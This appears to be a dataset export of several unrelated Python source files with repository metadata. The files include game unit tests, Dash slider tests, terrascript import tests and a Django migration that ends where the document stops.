(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.118181848735966, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9775953652797049, 'all_wheels_on_track': True, 'distance_from_center': 0.02104085807541295, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984166466617, 'object_in_camera': False, 'heading': 0.816198971909553, 'objects_speed': [], 'progress': 5.857024652819286, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 17.0}
]
for step in params:
print(step)
print(reward_function(step))
# print(reward_function(params[0]))
if __name__ == '__main__':
main()
# stepRewardsCSV.close()
# stepLocationsCSV.close()
| 2,143.358974
| 4,891
| 0.791712
| 8,485
| 83,591
| 7.739776
| 0.049146
| 0.003106
| 0.006213
| 0.017085
| 0.957166
| 0.957166
| 0.950177
| 0.950177
| 0.949019
| 0.928189
| 0
| 0.752326
| 0.055126
| 83,591
| 38
| 4,892
| 2,199.763158
| 0.079144
| 0.002596
| 0
| 0
| 0
| 0
| 0.069021
| 0.010196
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.137931
| 0
| 0.172414
| 0.068966
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
48a30895dbb6abf7a374bd2cc5d6a58bf780fd55
| 182
|
py
|
Python
|
files/models/__init__.py
|
exolever/django_filestack
|
53d00e14721bb672340ebf7f199812b8d16a122a
|
[
"BSD-3-Clause"
] | 3
|
2019-04-12T19:26:45.000Z
|
2019-06-06T22:59:21.000Z
|
files/models/__init__.py
|
exolever/django-filestack
|
53d00e14721bb672340ebf7f199812b8d16a122a
|
[
"BSD-3-Clause"
] | null | null | null |
files/models/__init__.py
|
exolever/django-filestack
|
53d00e14721bb672340ebf7f199812b8d16a122a
|
[
"BSD-3-Clause"
] | null | null | null |
from .uploaded_file import UploadedFile # noqa
from .uploaded_file_version import UploadedFileVersion # noqa
from .uploaded_file_visibility import UploadedFileVisibility # noqa
| 45.5
| 68
| 0.840659
| 20
| 182
| 7.4
| 0.5
| 0.243243
| 0.324324
| 0.27027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126374
| 182
| 3
| 69
| 60.666667
| 0.930818
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
48ab1b11ea750f21dc5cf81f1f24b9cd3d86b4c4
| 6,060
|
py
|
Python
|
example/tests.py
|
helioh2/pygame-universe
|
94be98072ff1644480aaaab9692c8040223c3fb1
|
[
"MIT"
] | 1
|
2018-04-04T17:55:35.000Z
|
2018-04-04T17:55:35.000Z
|
example/tests.py
|
helioh2/pygame-universe
|
94be98072ff1644480aaaab9692c8040223c3fb1
|
[
"MIT"
] | null | null | null |
example/tests.py
|
helioh2/pygame-universe
|
94be98072ff1644480aaaab9692c8040223c3fb1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from funcoes import *
class MeusTestes(unittest.TestCase):
def testMover_vaca_x(self):
# Vaca andando para frente (sem bater na parede)
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA, 3, CHAO, 0)), Vaca(PAREDE_ESQUERDA + 3, 3, CHAO, 0))
self.assertEqual(mover_vaca_x(Vaca(LARGURA // 2, 3, CHAO, 0)), Vaca(LARGURA // 2 + 3, 3, CHAO, 0))
# Vaca andando para tras (sem bater na parede)
self.assertEqual(mover_vaca_x(Vaca(LARGURA // 2, -3, CHAO, 0)), Vaca(LARGURA // 2 - 3, -3, CHAO, 0))
# Vaca no limite direito, e tendo que voltar
self.assertEqual(mover_vaca_x(Vaca(PAREDE_DIREITA, 3, CHAO, 0)), Vaca(PAREDE_DIREITA - 3, -3, CHAO, 0))
# Vaca no limite esquerdo, e tendo que voltar
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA, -3, CHAO, 0)), Vaca(PAREDE_ESQUERDA + 3, 3, CHAO, 0))
# Vaca quase atingindo limite direito, e parando no limite
self.assertEqual(mover_vaca_x(Vaca(PAREDE_DIREITA - 2, 3, CHAO, 0)), Vaca(PAREDE_DIREITA, 3, CHAO, 0))
self.assertEqual(mover_vaca_x(Vaca(PAREDE_DIREITA - 1, 3, CHAO, 0)), Vaca(PAREDE_DIREITA, 3, CHAO, 0))
# Vaca quase atingindo limite esquerdo, e parando no limite
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA + 2, -3, CHAO, 0)), Vaca(PAREDE_ESQUERDA, -3, CHAO, 0))
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA + 1, -3, CHAO, 0)), Vaca(PAREDE_ESQUERDA, -3, CHAO, 0))
def testMover_vaca_y(self):
#QUEDA LIVRE
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=60, dy=0)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=60+G, dy=G))
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=(60 + G), dy=G)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=(60 + G) + G+G, dy=G+G))
# JA ESTÁ NO CHAO
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0))
# CHEGANDO NO CHAO
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO-2*G, dy=3*G)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0))
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO - 3 * G, dy=3 * G)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0))
def testTrata_tecla(self):
self.assertEqual(trata_tecla_vaca(Vaca(50, 0, CHAO, 0), pg.K_LEFT), Vaca(50, -DX, CHAO, 0))
self.assertEqual(trata_tecla_vaca(Vaca(50, 0,CHAO, 0), pg.K_RIGHT), Vaca(50, DX, CHAO, 0))
# self.assertEqual(trata_tecla_vaca(Vaca(100, -3), pg.K_SPACE), Vaca(100, 3))
self.assertEqual(trata_tecla_vaca(Vaca(50, 3, CHAO, 0), pg.K_a), Vaca(50, 3, CHAO, 0))
# self.assertNotEqual( trata_tecla(Vaca(100, -3), pg.K_a), Vaca(100, 3))
self.assertEqual(trata_tecla_vaca(Vaca(50, 0, CHAO, 0), pg.K_UP), Vaca(50, 0, CHAO-10, -20))
def testTrataSoltaTecla(self):
self.assertEqual(trata_solta_tecla_vaca(Vaca(50, -DX, CHAO, 0), pg.K_LEFT), Vaca(50, 0, CHAO, 0))
self.assertEqual(trata_solta_tecla_vaca(Vaca(50, DX, CHAO, 0), pg.K_RIGHT), Vaca(50, 0, CHAO, 0))
def testMover_cc(self):
# Chupacabra andando para frente (sem bater na parede)
self.assertEqual(mover_cc(Chupacabra(X_CC,y=PAREDE_CIMA, dy=3)), Chupacabra(X_CC, y=PAREDE_CIMA + 3, dy=3))
self.assertEqual(mover_cc(Chupacabra(X_CC, ALTURA // 2, 3)), Chupacabra(X_CC, ALTURA // 2 + 3, 3))
# Chupacabra andando para tras (sem bater na parede)
self.assertEqual(mover_cc(Chupacabra(X_CC, ALTURA // 2, -3)), Chupacabra(X_CC, ALTURA // 2 - 3, -3))
# Chupacabra no limite direito, e tendo que voltar
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_BAIXO, 3)), Chupacabra(X_CC, PAREDE_BAIXO - 3, -3))
# Chupacabra no limite esquerdo, e tendo que voltar
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_CIMA, -3)), Chupacabra(X_CC, PAREDE_CIMA + 3, 3))
# Chupacabra quase atingindo limite direito, e parando no limite
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_BAIXO - 2, 3)), Chupacabra(X_CC, PAREDE_BAIXO, 3))
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_BAIXO - 1, 3)), Chupacabra(X_CC, PAREDE_BAIXO, 3))
# Chupacabra quase atingindo limite esquerdo, e parando no limite
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_CIMA + 2, -3)), Chupacabra(X_CC, PAREDE_CIMA, -3))
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_CIMA + 1, -3)), Chupacabra(X_CC, PAREDE_CIMA, -3))
def testDistancia(self):
self.assertEqual(distancia(0, 4, 3, 0), 5)
import math
self.assertEqual(distancia(1, 2, 3, 4), math.sqrt((3 - 1) ** 2 + (4 - 2) ** 2))
def testMover_jogo(self):
self.assertEqual(mover_jogo(
Jogo(vaca=Vaca(PAREDE_ESQUERDA, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, PAREDE_CIMA, 3)],
game_over=False)),
Jogo(vaca=Vaca(PAREDE_ESQUERDA + 3, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, PAREDE_CIMA + 3, 3)],
game_over=False) )
self.assertEqual(mover_jogo(
Jogo(vaca=Vaca(X_CC, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, CHAO, 3)],
game_over=False)),
Jogo(vaca=Vaca(X_CC, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, CHAO, 3)],
game_over=True))
def testColidirem(self):
self.assertFalse(colidirem(VACA_INICIAL, CC_INICIAL))
self.assertTrue(colidirem(Vaca(X_CC, 3, CHAO, 0), Chupacabra(X_CC, CHAO, 3)))
self.assertTrue(colidirem(
Vaca(X_CC, 3, CHAO, 0),
Chupacabra(X_CC, CHAO - IMG_VACA_INO.get_width() // 2 + 3, 3)))
# unittest.main()
| 47.34375
| 115
| 0.615017
| 899
| 6,060
| 3.978865
| 0.113459
| 0.048924
| 0.043612
| 0.093933
| 0.850154
| 0.830584
| 0.814649
| 0.719597
| 0.708974
| 0.640201
| 0
| 0.045514
| 0.245875
| 6,060
| 127
| 116
| 47.716535
| 0.737199
| 0.144059
| 0
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.111111
| false
| 0
| 0.041667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48b2c386804d00673a336240b01fafe57a49f593
| 42
|
py
|
Python
|
scripts/tests/test.py
|
karry3775/AutomatingTheBoringStuffWithPython
|
7c7850cd303fac5460fffc460e60da457f5d8a9b
|
[
"MIT"
] | null | null | null |
scripts/tests/test.py
|
karry3775/AutomatingTheBoringStuffWithPython
|
7c7850cd303fac5460fffc460e60da457f5d8a9b
|
[
"MIT"
] | null | null | null |
scripts/tests/test.py
|
karry3775/AutomatingTheBoringStuffWithPython
|
7c7850cd303fac5460fffc460e60da457f5d8a9b
|
[
"MIT"
] | null | null | null |
import pytest
def test_none():
pass
| 7
| 16
| 0.666667
| 6
| 42
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.261905
| 42
| 5
| 17
| 8.4
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
d28c0429c6f9869b435b6d701177537b5a41b747
| 10,414
|
py
|
Python
|
packages/dash-core-components/tests/integration/sliders/test_sliders.py
|
HammadTheOne/dash
|
5676e4d8b1f090eab9ac1480a44e98837edd859b
|
[
"MIT"
] | null | null | null |
packages/dash-core-components/tests/integration/sliders/test_sliders.py
|
HammadTheOne/dash
|
5676e4d8b1f090eab9ac1480a44e98837edd859b
|
[
"MIT"
] | null | null | null |
packages/dash-core-components/tests/integration/sliders/test_sliders.py
|
HammadTheOne/dash
|
5676e4d8b1f090eab9ac1480a44e98837edd859b
|
[
"MIT"
] | null | null | null |
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
def test_slsl001_always_visible_slider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.Slider(
id="slider",
min=0,
max=20,
step=1,
value=5,
tooltip={"always_visible": True},
),
html.Div(id="out"),
]
)
@app.callback(Output("out", "children"), [Input("slider", "value")])
def update_output(value):
return "You have selected {}".format(value)
dash_dcc.start_server(app)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 5")
slider = dash_dcc.find_element("#slider")
dash_dcc.click_at_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 10")
dash_dcc.click_at_coord_fractions(slider, 0.75, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 15")
def test_slsl002_always_visible_rangeslider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
style={"width": "400px"},
children=[
dcc.RangeSlider(
id="rangeslider",
min=0,
max=20,
step=1,
value=[5, 15],
tooltip={"always_visible": True},
),
html.Div(id="out"),
],
)
@app.callback(Output("out", "children"), [Input("rangeslider", "value")])
def update_output(rng):
return "You have selected {}-{}".format(*rng)
dash_dcc.start_server(app)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 5-15")
slider = dash_dcc.find_element("#rangeslider")
dash_dcc.click_at_coord_fractions(slider, 0.15, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 2-15")
dash_dcc.click_at_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 2-10")
def test_slsl003_out_of_range_marks_slider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.Slider(
min=0, max=5, marks={i: "Label {}".format(i) for i in range(-1, 10)}
)
]
)
dash_dcc.start_server(app)
assert len(dash_dcc.find_elements("span.rc-slider-mark-text")) == 6
def test_slsl004_out_of_range_marks_rangeslider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.RangeSlider(
min=0, max=5, marks={i: "Label {}".format(i) for i in range(-1, 10)}
)
]
)
dash_dcc.start_server(app)
assert len(dash_dcc.find_elements("span.rc-slider-mark-text")) == 6
def test_slsl005_slider_tooltip(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
html.Div(
[
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
id="test-slider",
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
],
style=dict(maxHeight=300, overflowX="scroll"),
)
]
)
dash_dcc.start_server(app)
dash_dcc.wait_for_element("#test-slider")
dash_dcc.percy_snapshot(
"slider-make sure tooltips are only visible if parent slider is visible"
)
def test_slsl005_rangeslider_tooltip(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
html.Div(
[
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100, marginTop=25),
),
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.RangeSlider(
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.RangeSlider(
id="test-slider",
min=0,
max=100,
value=[0, 65],
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
],
style=dict(
maxHeight=300, overflowX="scroll", backgroundColor="#edf9f7"
),
)
]
)
dash_dcc.start_server(app)
dash_dcc.wait_for_element("#test-slider")
dash_dcc.percy_snapshot("slsl005- dcc.RangeSlider tooltip position")
def test_slsl006_drag_value_slider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.Slider(
id="slider",
min=0,
max=20,
step=1,
value=5,
tooltip={"always_visible": True},
),
html.Div(id="out-value"),
html.Div(id="out-drag-value"),
]
)
@app.callback(Output("out-drag-value", "children"), [Input("slider", "drag_value")])
def update_output(value):
return "You have dragged {}".format(value)
@app.callback(Output("out-value", "children"), [Input("slider", "value")])
def update_output(value):
return "You have selected {}".format(value)
dash_dcc.start_server(app)
slider = dash_dcc.find_element("#slider")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5")
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 5")
dash_dcc.click_and_hold_at_coord_fractions(slider, 0.25, 0.25)
dash_dcc.move_to_coord_fractions(slider, 0.75, 0.25)
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 15")
dash_dcc.move_to_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 10")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5")
dash_dcc.release()
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 10")
def test_slsl007_drag_value_rangeslider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.RangeSlider(
id="slider",
min=0,
max=20,
step=1,
value=(5, 15),
tooltip={"always_visible": True},
),
html.Div(id="out-value"),
html.Div(id="out-drag-value"),
]
)
@app.callback(Output("out-drag-value", "children"), [Input("slider", "drag_value")])
def update_output(value):
value = value or (None, None)
return "You have dragged {}-{}".format(*value)
@app.callback(Output("out-value", "children"), [Input("slider", "value")])
def update_output(value):
return "You have selected {}-{}".format(*value)
dash_dcc.start_server(app)
slider = dash_dcc.find_element("#slider")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5-15")
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 5-15")
dash_dcc.click_and_hold_at_coord_fractions(slider, 0.25, 0.25)
dash_dcc.move_to_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out-drag-value", "You have dragged 10-15")
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 5-15")
dash_dcc.release()
dash_dcc.wait_for_text_to_equal("#out-value", "You have selected 10-15")
| 33.702265
| 88
| 0.473305
| 1,100
| 10,414
| 4.24
| 0.104545
| 0.081046
| 0.044811
| 0.057033
| 0.880789
| 0.869425
| 0.869425
| 0.869425
| 0.848628
| 0.848199
| 0
| 0.042199
| 0.406088
| 10,414
| 308
| 89
| 33.811688
| 0.711884
| 0
| 0
| 0.708955
| 0
| 0
| 0.143653
| 0.004609
| 0
| 0
| 0
| 0
| 0.007463
| 1
| 0.052239
| false
| 0
| 0.014925
| 0.018657
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d29ff363862bc8b7124f00dacbad38a2eb1530a2
| 215
|
py
|
Python
|
survey/surveys/metadata/__init__.py
|
vahndi/quant-survey
|
1a0fcf0c22e2c7306cba0218f82d24c97d28ee1f
|
[
"MIT"
] | 2
|
2021-04-10T21:50:36.000Z
|
2022-03-26T16:46:52.000Z
|
survey/surveys/metadata/__init__.py
|
vahndi/quant-survey
|
1a0fcf0c22e2c7306cba0218f82d24c97d28ee1f
|
[
"MIT"
] | 11
|
2020-08-30T18:47:14.000Z
|
2021-09-09T15:57:19.000Z
|
survey/surveys/metadata/__init__.py
|
vahndi/quant-survey
|
1a0fcf0c22e2c7306cba0218f82d24c97d28ee1f
|
[
"MIT"
] | null | null | null |
from survey.surveys.metadata.attribute_metadata import AttributeMetadata
from survey.surveys.metadata.category_metadata import CategoryMetadata
from survey.surveys.metadata.question_metadata import QuestionMetadata
| 53.75
| 72
| 0.902326
| 24
| 215
| 7.958333
| 0.458333
| 0.157068
| 0.267016
| 0.39267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055814
| 215
| 3
| 73
| 71.666667
| 0.940887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2b5565041a638a681f80e4003643c17f88aac17
| 4,307
|
py
|
Python
|
tests/test_provider_ucloud_ucloud.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_ucloud_ucloud.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_ucloud_ucloud.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_ucloud_ucloud.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:29:33 UTC)
def test_provider_import():
import terrascript.provider.ucloud.ucloud
def test_resource_import():
from terrascript.resource.ucloud.ucloud import ucloud_cube_pod
from terrascript.resource.ucloud.ucloud import ucloud_db_instance
from terrascript.resource.ucloud.ucloud import ucloud_disk
from terrascript.resource.ucloud.ucloud import ucloud_disk_attachment
from terrascript.resource.ucloud.ucloud import ucloud_eip
from terrascript.resource.ucloud.ucloud import ucloud_eip_association
from terrascript.resource.ucloud.ucloud import ucloud_instance
from terrascript.resource.ucloud.ucloud import ucloud_isolation_group
from terrascript.resource.ucloud.ucloud import ucloud_lb
from terrascript.resource.ucloud.ucloud import ucloud_lb_attachment
from terrascript.resource.ucloud.ucloud import ucloud_lb_listener
from terrascript.resource.ucloud.ucloud import ucloud_lb_rule
from terrascript.resource.ucloud.ucloud import ucloud_lb_ssl
from terrascript.resource.ucloud.ucloud import ucloud_lb_ssl_attachment
from terrascript.resource.ucloud.ucloud import ucloud_memcache_instance
from terrascript.resource.ucloud.ucloud import ucloud_nat_gateway
from terrascript.resource.ucloud.ucloud import ucloud_nat_gateway_rule
from terrascript.resource.ucloud.ucloud import ucloud_redis_instance
from terrascript.resource.ucloud.ucloud import ucloud_security_group
from terrascript.resource.ucloud.ucloud import ucloud_subnet
from terrascript.resource.ucloud.ucloud import ucloud_udpn_connection
from terrascript.resource.ucloud.ucloud import ucloud_ufs_volume
from terrascript.resource.ucloud.ucloud import ucloud_uk8s_cluster
from terrascript.resource.ucloud.ucloud import ucloud_uk8s_node
from terrascript.resource.ucloud.ucloud import ucloud_us3_bucket
from terrascript.resource.ucloud.ucloud import ucloud_vip
from terrascript.resource.ucloud.ucloud import ucloud_vpc
from terrascript.resource.ucloud.ucloud import ucloud_vpc_peering_connection
from terrascript.resource.ucloud.ucloud import ucloud_vpn_connection
from terrascript.resource.ucloud.ucloud import ucloud_vpn_customer_gateway
from terrascript.resource.ucloud.ucloud import ucloud_vpn_gateway
def test_datasource_import():
from terrascript.data.ucloud.ucloud import ucloud_db_instances
from terrascript.data.ucloud.ucloud import ucloud_db_parameter_groups
from terrascript.data.ucloud.ucloud import ucloud_disks
from terrascript.data.ucloud.ucloud import ucloud_eips
from terrascript.data.ucloud.ucloud import ucloud_images
from terrascript.data.ucloud.ucloud import ucloud_instances
from terrascript.data.ucloud.ucloud import ucloud_lb_attachments
from terrascript.data.ucloud.ucloud import ucloud_lb_listeners
from terrascript.data.ucloud.ucloud import ucloud_lb_rules
from terrascript.data.ucloud.ucloud import ucloud_lb_ssls
from terrascript.data.ucloud.ucloud import ucloud_lbs
from terrascript.data.ucloud.ucloud import ucloud_nat_gateways
from terrascript.data.ucloud.ucloud import ucloud_projects
from terrascript.data.ucloud.ucloud import ucloud_security_groups
from terrascript.data.ucloud.ucloud import ucloud_subnets
from terrascript.data.ucloud.ucloud import ucloud_ufs_volumes
from terrascript.data.ucloud.ucloud import ucloud_us3_buckets
from terrascript.data.ucloud.ucloud import ucloud_vpcs
from terrascript.data.ucloud.ucloud import ucloud_vpn_connections
from terrascript.data.ucloud.ucloud import ucloud_vpn_customer_gateways
from terrascript.data.ucloud.ucloud import ucloud_vpn_gateways
from terrascript.data.ucloud.ucloud import ucloud_zones
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.ucloud.ucloud
#
# t = terrascript.provider.ucloud.ucloud.ucloud()
# s = str(t)
#
# assert 'https://github.com/ucloud/terraform-provider-ucloud' in s
# assert '1.29.0' in s
| 32.877863
| 80
| 0.812398
| 558
| 4,307
| 6.077061
| 0.195341
| 0.205249
| 0.281333
| 0.375111
| 0.823651
| 0.792097
| 0.787378
| 0.590091
| 0.099676
| 0
| 0
| 0.005366
| 0.134665
| 4,307
| 130
| 81
| 33.130769
| 0.904481
| 0.113072
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007692
| 0
| 1
| 0.052632
| true
| 0
| 1
| 0
| 1.052632
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
96056bed272ca67c9fd35114dae9757cf7a8f3bf
| 2,857
|
py
|
Python
|
saleor/unurshop/package/migrations/0008_auto_20200918_1533.py
|
nlkhagva/saleor
|
0d75807d08ac49afcc904733724ac870e8359c10
|
[
"CC-BY-4.0"
] | null | null | null |
saleor/unurshop/package/migrations/0008_auto_20200918_1533.py
|
nlkhagva/saleor
|
0d75807d08ac49afcc904733724ac870e8359c10
|
[
"CC-BY-4.0"
] | 1
|
2022-02-15T03:31:12.000Z
|
2022-02-15T03:31:12.000Z
|
saleor/unurshop/package/migrations/0008_auto_20200918_1533.py
|
nlkhagva/ushop
|
abf637eb6f7224e2d65d62d72a0c15139c64bb39
|
[
"CC-BY-4.0"
] | null | null | null |
# Generated by Django 3.1 on 2020-09-18 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Reshape package pricing fields.

    Drops ``package.total_gross_amount``, adds ``package.perkg_amount``, and
    relaxes ten weight/amount columns to nullable 3-place decimals; finally
    tightens ``packageline.unit_price_amount`` to a required decimal.
    """

    dependencies = [
        ('package', '0007_auto_20200916_1452'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='package',
            name='total_gross_amount',
        ),
        migrations.AddField(
            model_name='package',
            name='perkg_amount',
            field=models.DecimalField(decimal_places=3, default=0, max_digits=12),
        ),
    ] + [
        # Each (model, field) pair receives the same nullable decimal shape.
        migrations.AlterField(
            model_name=model,
            name=field,
            field=models.DecimalField(
                blank=True, decimal_places=3, max_digits=12, null=True
            ),
        )
        for model, field in [
            ('gaduurpackage', 'actual_weight'),
            ('gaduurpackage', 'total_amount'),
            ('gaduurpackage', 'total_cost'),
            ('gaduurpackage', 'total_paid_amount'),
            ('gaduurpackage', 'total_weight'),
            ('package', 'gross_weight'),
            ('package', 'height'),
            ('package', 'length'),
            ('package', 'net_weight'),
